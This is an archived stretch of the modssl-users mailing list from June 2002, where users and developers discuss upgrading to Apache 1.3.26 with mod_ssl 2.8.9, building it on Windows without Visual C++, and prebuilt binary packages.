Received: from kermit.mail.pas.earthlink.net ([207.217.120.241] helo=kermit.psp.pas.earthlink.net)
	by goose.mail.pas.earthlink.net with esmtp (Exim 3.33 #2)
	id 17L4I0-0005TJ-00
	for modssl-users@modssl.org; Thu, 20 Jun 2002 08:56:04 -0700
Received: (from nobody@localhost)
	by kermit.psp.pas.earthlink.net (8.10.2+Sun/8.10.2) id g5KFu3c10000
	for modssl-users@modssl.org; Thu, 20 Jun 2002 08:56:03 -0700 (PDT)
Date: Thu, 20 Jun 2002 08:56:03 -0700
From: RON MCKEEVER
To: modssl-users@modssl.org
Subject: Upgrade Question
Message-ID: 
X-Originating-IP: 134.9.11.140
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: RON MCKEEVER
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

Hi 

I currently have mod_ssl-2.8.7-1.3.23(apache) deal. I have seen the security issue and the suggetions to upgrade to 2.0 or 1.3.26. 

Couple of questions, Please.
1. Can I just install the new apache version over my old install? And will it still use my ssl info? If not is there a command I can run when I configure the new apache to not overright all my info in /opt/apache?

2. Or do I need to wait for a "mod_ssl-2.x.x-1.3.26" release??

Thanks for any input,
Rob
 
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Thu Jun 20 20:25:49 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id UAA21113; Thu, 20 Jun 2002 20:24:24 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from deepthought.cs.virginia.edu id UAA21061; Thu, 20 Jun 2002 20:23:35 +0200 (MET DST)
Received: from localhost (root@localhost)
	by deepthought.cs.virginia.edu (8.11.6/8.11.4) with ESMTP id g5KIKZ704900;
	Thu, 20 Jun 2002 14:20:36 -0400
Date: Thu, 20 Jun 2002 14:20:35 -0400 (EDT)
From: Cliff Woolley 
X-X-Sender: root@deepthought.cs.virginia.edu
To: modssl-users@modssl.org
cc: sven.luehrs@aksl.de, , 
Subject: Re: Apache 1.3.26 and mod_ssl
In-Reply-To: 
Message-ID: 
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Cliff Woolley 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

On Wed, 19 Jun 2002 Manuel.Bernhardt@aksl.de wrote:

> I've patched the Apache 1.3.26 sources with mod_ssl 2.8.8 and --force
> Option and it "works" .... I've apply the patch for 1.3.26 ....

Forget it.  Start over with a clean 1.3.26 and mod_ssl 2.8.9 which was
released quite a while ago now.

--Cliff

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Thu Jun 20 20:31:10 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id UAA21760; Thu, 20 Jun 2002 20:30:43 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from deepthought.cs.virginia.edu id UAA21652; Thu, 20 Jun 2002 20:29:37 +0200 (MET DST)
Received: from localhost (root@localhost)
	by deepthought.cs.virginia.edu (8.11.6/8.11.4) with ESMTP id g5KIQb305140;
	Thu, 20 Jun 2002 14:26:37 -0400
Date: Thu, 20 Jun 2002 14:26:37 -0400 (EDT)
From: Cliff Woolley 
X-X-Sender: root@deepthought.cs.virginia.edu
To: modssl-users@modssl.org, RON MCKEEVER 
Subject: Re: Upgrade Question
In-Reply-To: 
Message-ID: 
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Cliff Woolley 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

On Thu, 20 Jun 2002, RON MCKEEVER wrote:

> I currently have mod_ssl-2.8.7-1.3.23(apache) deal. I have seen the
> security issue and the suggetions to upgrade to 2.0 or 1.3.26.
>
> Couple of questions, Please.
>
> 1. Can I just install the new apache version over my old install? And
> will it still use my ssl info?

If by "info" you mean configuration, the answer is yes.  If by "info"
you mean mod_ssl itself, the answer is no.

> 2. Or do I need to wait for a "mod_ssl-2.x.x-1.3.26" release??

There has already been one.  mod_ssl 2.8.9 is out.

So just grab 1.3.26 and 2.8.9, compile them with the same options you
did on 1.3.23/2.8.7, and when you install it it will overwrite the old
binaries but keep your old config files.

(remember to back up the old install directory just in case ;)

--Cliff


______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Thu Jun 20 21:00:09 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id UAA23583; Thu, 20 Jun 2002 20:59:27 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from hotmail.com id UAA23560; Thu, 20 Jun 2002 20:58:47 +0200 (MET DST)
Received: from mail pickup service by hotmail.com with Microsoft SMTPSVC;
	 Thu, 20 Jun 2002 11:58:41 -0700
Received: from 204.115.33.236 by lw7fd.law7.hotmail.msn.com with HTTP;
	Thu, 20 Jun 2002 18:58:40 GMT
X-Originating-IP: [204.115.33.236]
From: "Jim Lee" 
To: modssl-users@modssl.org
Subject: Re: Apache 1.3.26 Upgrade Question
Date: Thu, 20 Jun 2002 18:58:40 +0000
Mime-Version: 1.0
Content-Type: text/plain; format=flowed
Message-ID: 
X-OriginalArrivalTime: 20 Jun 2002 18:58:41.0055 (UTC) FILETIME=[7E23AAF0:01C2188C]
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Jim Lee" 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users


The platform is win32. I do not have a VC++ 5.0 compiler installed. Any free 
C++ compiler download suggestion from the internet would be great.

Hi,

Could somebody help me create the Apache_1.3.26-Mod_SSL_x-OpenSSL_x
file from the mod_ssl-2.8.9-1.3.26.tar.gz file that has been released
recently.

what platform? unix requires nothing more than a configure in the mod_ssl 
directory, followed by make. Win32 is a little more cumbersome.
Aryeh


Aryeh Katz
VASCO
www.vasco.com


_________________________________________________________________
Chat with friends online, try MSN Messenger: http://messenger.msn.com

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Thu Jun 20 21:07:18 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id VAA24091; Thu, 20 Jun 2002 21:05:58 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from exchange.wgen.net id VAA23961; Thu, 20 Jun 2002 21:04:18 +0200 (MET DST)
content-class: urn:content-classes:message
Subject: RE: Apache 1.3.26 Upgrade Question
MIME-Version: 1.0
Content-Type: text/plain;
	charset="iso-8859-1"
Date: Thu, 20 Jun 2002 15:04:11 -0400
Message-ID: 
X-MimeOLE: Produced By Microsoft Exchange V6.0.5762.3
Thread-Topic: Apache 1.3.26 Upgrade Question
Thread-Index: AcIYjNmeSpUSi+a0TBifiaWV3JXAfAAABtgw
From: "Brian F. Vaughan" 
To: 
Cc: 
Content-Transfer-Encoding: 8bit
X-MIME-Autoconverted: from quoted-printable to 8bit by opensource.ee.ethz.ch id VAA24010
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Brian F. Vaughan" 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

Try GNUs compiler located at http://www.gnu.org/directory/Software_development/Compilers/

Brian Vaughan
IT Administrator
Wireless Generation, Inc.
26 W. 23rd. St.
New York, NY 10010
http://www.wgen.net


-----Original Message-----
From: Jim Lee [mailto:jimlee2@hotmail.com]
Sent: Thursday, June 20, 2002 2:59 PM
To: modssl-users@modssl.org
Subject: Re: Apache 1.3.26 Upgrade Question



The platform is win32. I do not have a VC++ 5.0 compiler installed. Any free 
C++ compiler download suggestion from the internet would be great.

Hi,

Could somebody help me create the Apache_1.3.26-Mod_SSL_x-OpenSSL_x
file from the mod_ssl-2.8.9-1.3.26.tar.gz file that has been released
recently.

what platform? unix requires nothing more than a configure in the mod_ssl 
directory, followed by make. Win32 is a little more cumbersome.
Aryeh


Aryeh Katz
VASCO
www.vasco.com


_________________________________________________________________
Chat with friends online, try MSN Messenger: http://messenger.msn.com

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Thu Jun 20 21:07:23 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id VAA24016; Thu, 20 Jun 2002 21:05:10 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from seraph3.grc.nasa.gov id VAA23939; Thu, 20 Jun 2002 21:03:49 +0200 (MET DST)
Received: from lombok-fi.lerc.nasa.gov (lombok-fi.lerc.nasa.gov [139.88.112.33])
	by seraph3.grc.nasa.gov (Postfix) with ESMTP id 960BF6415E
	for ; Thu, 20 Jun 2002 15:03:42 -0400 (EDT)
Received: from salderman.lerc.nasa.gov (salderman.lerc.nasa.gov [139.88.188.22])
	by lombok-fi.lerc.nasa.gov (NASA GRC 8.12.3/8.12.3) with ESMTP id g5KJ3gra028959
	for ; Thu, 20 Jun 2002 15:03:42 -0400 (EDT)
Received: (smalder@localhost) by salderman.lerc.nasa.gov (NASA LeRC 8.7.4.1/2.01-local)
        id PAA24626; Thu, 20 Jun 2002 15:03:41 -0400
X-Authentication-Warning: salderman.lerc.nasa.gov: smalder set sender to sean.m.alderman@grc.nasa.gov using -f
Subject: Re: Apache 1.3.26 Upgrade Question
From: Sean M Alderman 
To: modssl-users@modssl.org
In-Reply-To: 
References: 
Content-Type: text/plain
Content-Transfer-Encoding: 7bit
X-Mailer: Ximian Evolution 1.0.6.99 
Date: 20 Jun 2002 15:03:41 -0400
Message-Id: <1024599821.5612.1715.camel@salderman.lerc.nasa.gov>
Mime-Version: 1.0
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Sean M Alderman 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

I believe if you register for it you can download the commandline
version of Borland C++ for free now, although I don't know how well it
supports using configure and make files.

On Thu, 2002-06-20 at 14:58, Jim Lee wrote:
> 
> The platform is win32. I do not have a VC++ 5.0 compiler installed. Any free 
> C++ compiler download suggestion from the internet would be great.
> 
> Hi,
> 
> Could somebody help me create the Apache_1.3.26-Mod_SSL_x-OpenSSL_x
> file from the mod_ssl-2.8.9-1.3.26.tar.gz file that has been released
> recently.
> 
> what platform? unix requires nothing more than a configure in the mod_ssl 
> directory, followed by make. Win32 is a little more cumbersome.
> Aryeh
> 
> 
> Aryeh Katz
> VASCO
> www.vasco.com
> 
> 
> _________________________________________________________________
> Chat with friends online, try MSN Messenger: http://messenger.msn.com
> 
> ______________________________________________________________________
> Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
> User Support Mailing List                      modssl-users@modssl.org
> Automated List Manager                            majordomo@modssl.org
> 
-- 
Sean M. Alderman
ITRACK Systems Analyst
PACE/NCI - NASA Glenn Research Center
(216) 433-2795

Calling a windowed operating system "Windows" is like naming an
automobile "Wheels."
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Thu Jun 20 21:14:29 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id VAA24774; Thu, 20 Jun 2002 21:13:54 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from smtp.vasco.com id VAA24711; Thu, 20 Jun 2002 21:12:43 +0200 (MET DST)
Received: from 226.balt.vasco.com ([209.140.121.226]) by smtp.vasco.com with Microsoft SMTPSVC(5.0.2195.4905);
	 Thu, 20 Jun 2002 21:15:20 +0200
From: "Aryeh Katz" 
To: modssl-users@modssl.org
Received: from espanol.sytrix.com by 226.balt.vasco.com
          via smtpd (for [62.58.124.117]) with SMTP; 20 Jun 2002 19:12:40 UT
Date: Thu, 20 Jun 2002 15:13:17 -0400
MIME-Version: 1.0
Subject: Re: Apache 1.3.26 Upgrade Question
Message-ID: <3D11F10D.30236.1FEAE19F@localhost>
In-reply-to: 
X-mailer: Pegasus Mail for Windows (v4.01)
Content-type: text/plain; charset=US-ASCII
Content-transfer-encoding: 7BIT
Content-description: Mail message body
X-OriginalArrivalTime: 20 Jun 2002 19:15:21.0304 (UTC) FILETIME=[D2558D80:01C2188E]
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Aryeh Katz" 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users


> 
> The platform is win32. I do not have a VC++ 5.0 compiler installed.
> Any free C++ compiler download suggestion from the internet would be
> great.
you need VC. end of story.
---
Aryeh Katz
VASCO 			
www.vasco.com		

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Thu Jun 20 21:24:07 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id VAA25742; Thu, 20 Jun 2002 21:23:24 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from hotmail.com id VAA25705; Thu, 20 Jun 2002 21:22:27 +0200 (MET DST)
Received: from mail pickup service by hotmail.com with Microsoft SMTPSVC;
	 Thu, 20 Jun 2002 12:22:21 -0700
Received: from 204.115.33.236 by lw7fd.law7.hotmail.msn.com with HTTP;
	Thu, 20 Jun 2002 19:22:21 GMT
X-Originating-IP: [204.115.33.236]
From: "Jim Lee" 
To: modssl-users@modssl.org
Subject: Re: Apache 1.3.26 Upgrade Question
Date: Thu, 20 Jun 2002 19:22:21 +0000
Mime-Version: 1.0
Content-Type: text/plain; format=flowed
Message-ID: 
X-OriginalArrivalTime: 20 Jun 2002 19:22:21.0392 (UTC) FILETIME=[CCB9E500:01C2188F]
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Jim Lee" 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users


Hi,

I have been able to download and install Borland C++ 5.5 on my machine.

If this is not good enough, please provide me with instructions to create 
the Apache_1.3.26-Mod_SSL_2.8.9-OpenSSL_0.9.6c-WIN32.zip file.

I would somehow find a machine that has VC++ and get the job done.

Thanks.

Bye,
-Jim.


The platform is win32. I do not have a VC++ 5.0 compiler installed.
Any free C++ compiler download suggestion from the internet would be
great.

you need VC. end of story.

Aryeh Katz
VASCO
www.vasco.com


_________________________________________________________________
Send and receive Hotmail on your mobile device: http://mobile.msn.com

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Thu Jun 20 21:27:09 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id VAA25952; Thu, 20 Jun 2002 21:26:26 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via SMTP for 
	from mail.espgroup.net id VAA25914; Thu, 20 Jun 2002 21:25:44 +0200 (MET DST)
Received: from no.name.available by mail.espgroup.net
          via smtpd (for opensource-01.ee.ethz.ch [129.132.7.153]) with SMTP; 20 Jun 2002 19:24:42 UT
Received: (private information removed)
Received: from [63.66.134.226] by brickwall.espgroup.net
          via smtpd (for [10.3.1.2]) with SMTP; 20 Jun 2002 19:24:33 UT
Message-ID: <3D122D18.2060302@espgroup.net>
Date: Thu, 20 Jun 2002 15:29:28 -0400
From: "Dwayne Miller" 
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.0; en-US; rv:1.0rc1) Gecko/20020417
X-Accept-Language: en,pdf
MIME-Version: 1.0
To: modssl-users@modssl.org
Subject: Re: Apache 1.3.26 Upgrade Question
References: <3D11F10D.30236.1FEAE19F@localhost>
Content-Type: text/plain; charset=us-ascii; format=flowed
Content-Transfer-Encoding: 7bit
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Dwayne Miller" 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

Do you have to stick with 1.3.x?  Or could you go to 2.0.39?  It comes 
pre-packaged with a windows installer.  All you would have to add is the 
mod_ssl dll.

Sorry if I missed this info in earlier posts.

Aryeh Katz wrote:

>>The platform is win32. I do not have a VC++ 5.0 compiler installed.
>>Any free C++ compiler download suggestion from the internet would be
>>great.
>>    
>>
>you need VC. end of story.
>---
>Aryeh Katz
>VASCO 			
>www.vasco.com		
>
>______________________________________________________________________
>Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
>User Support Mailing List                      modssl-users@modssl.org
>Automated List Manager                            majordomo@modssl.org
>  
>


______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Thu Jun 20 21:30:12 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id VAA26132; Thu, 20 Jun 2002 21:29:19 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from trivadis.com id VAA26079; Thu, 20 Jun 2002 21:28:13 +0200 (MET DST)
Envelope-to: modssl-users@modssl.org
Received: from localhost.localdomain ([127.0.0.1] helo=lttit)
	by trivadis.com with smtp (Exim 3.34 #1)
	id 17L7SX-0000OY-00; Thu, 20 Jun 2002 21:19:09 +0200
Date: Thu, 20 Jun 2002 21:19:09 +0200
From: Tim Tassonis 
To: modssl-users@modssl.org
Cc: jimlee2@hotmail.com
Subject: Re: Apache 1.3.26 Upgrade Question
In-Reply-To: 
References: 
X-Mailer: Sylpheed version 0.7.7 (GTK+ 1.2.10; i686-pc-linux-gnu)
Mime-Version: 1.0
Content-Type: text/plain; charset=US-ASCII
Content-Transfer-Encoding: 7bit
Message-Id: 
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Tim Tassonis 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

Hi Jim

On Thu, 20 Jun 2002 17:48:38 +0000
"Jim Lee"  wrote:

> 
> Hi,
> 
> Please forgive my ignorance.
> 
> I wish to create a file similar to the following one:
> Apache_1.3.20-Mod_SSL_2.8.4-OpenSSL_0.9.6a-WIN32.zip,
> 
> namely,
> Apache_1.3.26-Mod_SSL_2.8.9-OpenSSL_0.9.6c-WIN32.zip,
> 
> I need this file so that i can upgrade my current Apache 1.3.20 server
> with mod_ssl to Apache 1.3.26 server with mod_ssl.
> 
> I do not have a VC++ 5.0 compiler on my desk and have no idea how i
> could get the above file from the apache_1.3.26.tar.gz and the 
> mod_ssl-2.8.9-1.3.26.tar.gz and the openssl-0.9.6c.tar.gz files.

I've got a VC++ 6.0 compiler at my desk and have already compiled the
stuff myself before on W32. I will do this tomorrow, however I will use
openssl 0.9.6d ....
I'll try to put it in the contrib area.

Bye
Tim


> 
> Any help from my friends would be highly appreciated.
> 
> Thanks.
> 
> Bye,
> -Jim.
> 
> 
> 
> From: "Gilles Gros" 
> 
> What is really your question ?
> 
> Just download the source and compile it.
> 
> apache 1.3.26 : http://www.apache.org/dist/httpd/apache_1.3.26.tar.gz
> mod SSL 2.8.9-1.3.26 :
> http://www.modssl.org/source/mod_ssl-2.8.9-1.3.26.tar.gz
> 
> Gilles
> 
> Hi,
> 
> Could somebody help me create the Apache_1.3.26-Mod_SSL_x-OpenSSL_x file
> from the mod_ssl-2.8.9-1.3.26.tar.gz file that has been released
> recently.
> 
> Thanks.
> 
> Bye,
> -Jim.
> 
> 
> On Wed, 19 Jun 2002, Jim Lee wrote:
> 
> We have been unable to find the above Apache_1.3.26-Mod_SSL_x file in
> the http://www.modssl.org/contrib/ area.
> 
> Nobody's contributed one yet.  I imagine it won't be that far off, it
> usually doesn't take too long.
> 
> We also wish to know if the SSL certificate has to be re-created after
> Apache is upgraded to 1.3.26 with the new mod_SSL.
> 
> No.
> 
> --Cliff
> 
> 
> _________________________________________________________________
> Send and receive Hotmail on your mobile device: http://mobile.msn.com
> 
> ______________________________________________________________________
> Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
> User Support Mailing List                      modssl-users@modssl.org
> Automated List Manager                            majordomo@modssl.org
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Thu Jun 20 21:32:31 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id VAA26297; Thu, 20 Jun 2002 21:31:29 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from imo-m10.mx.aol.com id VAA26201; Thu, 20 Jun 2002 21:30:13 +0200 (MET DST)
Received: from FrdQ4@netscape.net
	by imo-m10.mx.aol.com (mail_out_v32.21.) id m.c2.301f6df (16213)
	 for ; Thu, 20 Jun 2002 15:29:38 -0400 (EDT)
Received: from  netscape.net (act181-35.ucsd.edu [132.239.181.35]) by air-in01.mx.aol.com (v86_r1.13) with ESMTP id MAILININ11-0620152938; Thu, 20 Jun 2002 15:29:38 -0400
Message-ID: <3D122CE5.409@netscape.net>
Date: Thu, 20 Jun 2002 12:28:37 -0700
From: Fred Quimby 
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.0; en-US; rv:1.0rc2) Gecko/20020512 Netscape/7.0b1
X-Accept-Language: en-us, en
MIME-Version: 1.0
To: modssl-users@modssl.org
Subject: modssl for apache 2.0.39
Content-Type: text/plain; charset=us-ascii; format=flowed
Content-Transfer-Encoding: 7bit
X-Mailer: Unknown (No Version)
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Fred Quimby 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

Does anyone now when we can expect new modssl module for 2.0.39 or is 
there already one I can use?

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Thu Jun 20 21:34:32 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id VAA26450; Thu, 20 Jun 2002 21:33:33 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from smtp.vasco.com id VAA26356; Thu, 20 Jun 2002 21:32:13 +0200 (MET DST)
Received: from 226.balt.vasco.com ([209.140.121.226]) by smtp.vasco.com with Microsoft SMTPSVC(5.0.2195.4905);
	 Thu, 20 Jun 2002 21:34:52 +0200
From: "Aryeh Katz" 
To: modssl-users@modssl.org
Received: from espanol.sytrix.com by 226.balt.vasco.com
          via smtpd (for [62.58.124.117]) with SMTP; 20 Jun 2002 19:32:12 UT
Date: Thu, 20 Jun 2002 15:32:50 -0400
MIME-Version: 1.0
Subject: Re: Apache 1.3.26 Upgrade Question
Message-ID: <3D11F5A2.31863.1FFCC4AB@localhost>
In-reply-to: <3D122D18.2060302@espgroup.net>
X-mailer: Pegasus Mail for Windows (v4.01)
Content-type: text/plain; charset=US-ASCII
Content-transfer-encoding: 7BIT
Content-description: Mail message body
X-OriginalArrivalTime: 20 Jun 2002 19:34:53.0327 (UTC) FILETIME=[8CEA11F0:01C21891]
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Aryeh Katz" 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

> Do you have to stick with 1.3.x?  Or could you go to 2.0.39?  It comes
> pre-packaged with a windows installer.  All you would have to add is
> the mod_ssl dll.
> 
without a comiler, this isn't going to do him any good. He needs a compiler, 
or a binary version. There is no binary version of mod_ssl, and seemingly, 
none of 1.3.26. Best advice is to somehow get the compiler, and follow the 
instructions in INSTALL.win32.

---
Aryeh Katz
VASCO 			
www.vasco.com		

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Thu Jun 20 21:37:04 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id VAA26713; Thu, 20 Jun 2002 21:35:50 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from battersbox.nameconnector.com id VAA26568; Thu, 20 Jun 2002 21:34:38 +0200 (MET DST)
Received: from MAILBOX.nameconnector.com ([10.1.64.1]) by battersbox.nameconnector.com with Microsoft SMTPSVC(5.0.2195.4905);
	 Thu, 20 Jun 2002 15:34:31 -0400
Received: by MAILBOX.nameconnector.com with Internet Mail Service (5.5.2653.19)
	id ; Thu, 20 Jun 2002 15:34:31 -0400
Message-ID: <61957B071FF421419E567A28A45C7FE514A555@MAILBOX.nameconnector.com>
From: Geoffrey Talvola 
To: "'modssl-users@modssl.org'" 
Subject: RE: Apache 1.3.26 Upgrade Question
Date: Thu, 20 Jun 2002 15:34:30 -0400
MIME-Version: 1.0
X-Mailer: Internet Mail Service (5.5.2653.19)
Content-Type: text/plain;
	charset="iso-8859-1"
X-OriginalArrivalTime: 20 Jun 2002 19:34:31.0095 (UTC) FILETIME=[7FA9BC70:01C21891]
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Geoffrey Talvola 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

This should help you out.  The 1.0.2b2 version of OpenSA available at
http://www.opensa.org/development/news/97.html contains pre-built Windows
binaries for Apache 1.3.26, mod_ssl 2.8.9, and OpelSSL 0.9.6c.  It also has
a nice graphical installer and comes with pre-built versions of several
other Apache modules.  Highly recommended!

Thanks to Daniel Reichenbach for building this very nice package and for
responding quickly to create a new version yesterday.

- Geoff

> -----Original Message-----
> From: Jim Lee [mailto:jimlee2@hotmail.com]
> Sent: Thursday, June 20, 2002 3:22 PM
> To: modssl-users@modssl.org
> Subject: Re: Apache 1.3.26 Upgrade Question
> 
> 
> 
> Hi,
> 
> I have been able to download and install Borland C++ 5.5 on 
> my machine.
> 
> If this is not good enough, please provide me with 
> instructions to create 
> the Apache_1.3.26-Mod_SSL_2.8.9-OpenSSL_0.9.6c-WIN32.zip file.
> 
> I would somehow find a machine that has VC++ and get the job done.
> 
> Thanks.
> 
> Bye,
> -Jim.
> 
> 
> The platform is win32. I do not have a VC++ 5.0 compiler installed.
> Any free C++ compiler download suggestion from the internet would be
> great.
> 
> you need VC. end of story.
> 
> Aryeh Katz
> VASCO
> www.vasco.com
> 
> 
> _________________________________________________________________
> Send and receive Hotmail on your mobile device: http://mobile.msn.com
> 
> ______________________________________________________________________
> Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
> User Support Mailing List                      modssl-users@modssl.org
> Automated List Manager                            majordomo@modssl.org
> 
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Thu Jun 20 21:37:12 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id VAA26822; Thu, 20 Jun 2002 21:36:48 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from ivivos.com id VAA26694; Thu, 20 Jun 2002 21:35:33 +0200 (MET DST)
Received: from elusion [66.57.168.62] by ivivos.com with ESMTP
  (SMTPD32-7.07) id AEAC7870080; Thu, 20 Jun 2002 15:36:12 -0400
From: "Chris Hsiang" 
To: 
Subject: RE: modssl for apache 2.0.39
Date: Thu, 20 Jun 2002 15:36:11 -0400
Message-ID: <001701c21891$bc0bf520$0100a8c0@ivivos.com>
MIME-Version: 1.0
Content-Type: text/plain;
	charset="US-ASCII"
Content-Transfer-Encoding: 7bit
X-Priority: 3 (Normal)
X-MSMail-Priority: Normal
X-Mailer: Microsoft Outlook, Build 10.0.2616
X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2600.0000
In-Reply-To: <3D122CE5.409@netscape.net>
Importance: Normal
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Chris Hsiang" 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

ModSSL for apache 2.0.39 is including with apache source code.

Chris Hsiang

From: owner-modssl-users@modssl.org
[mailto:owner-modssl-users@modssl.org] On Behalf Of Fred Quimby
Sent: Thursday, June 20, 2002 3:29 PM
To: modssl-users@modssl.org
